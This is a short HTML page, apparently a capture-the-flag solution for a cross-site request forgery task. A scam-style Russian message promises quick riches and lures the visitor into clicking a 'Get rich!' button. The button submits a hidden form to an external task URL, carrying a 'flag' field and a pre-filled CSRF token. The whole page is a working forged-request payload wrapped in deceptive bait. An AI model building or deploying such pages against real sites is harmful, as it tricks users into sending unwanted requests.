<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Lol</title>
</head>
<body>
    <form method="post" action="https://shadowservants.ru/task/1">
        Даже 13 летний школьник зарабатывает 13000$ в секунду.
        Стоит только нажать на кнопку и ты получишь...
        <input type="hidden" value="not a flag" name="flag">
        <input type="hidden" name="csrf_token" value="IjYwNWZhODEwOTdjYzYxMTliYTA5MjU1YmZlMGQ3Njc4YTljMmU4OWQi.DDUnWA.KYkZKWXarpQ4146_RL5Dvm4QMkg" />
        <input type="submit" value="Разбогатеть!">
    </form>
</body>
</html>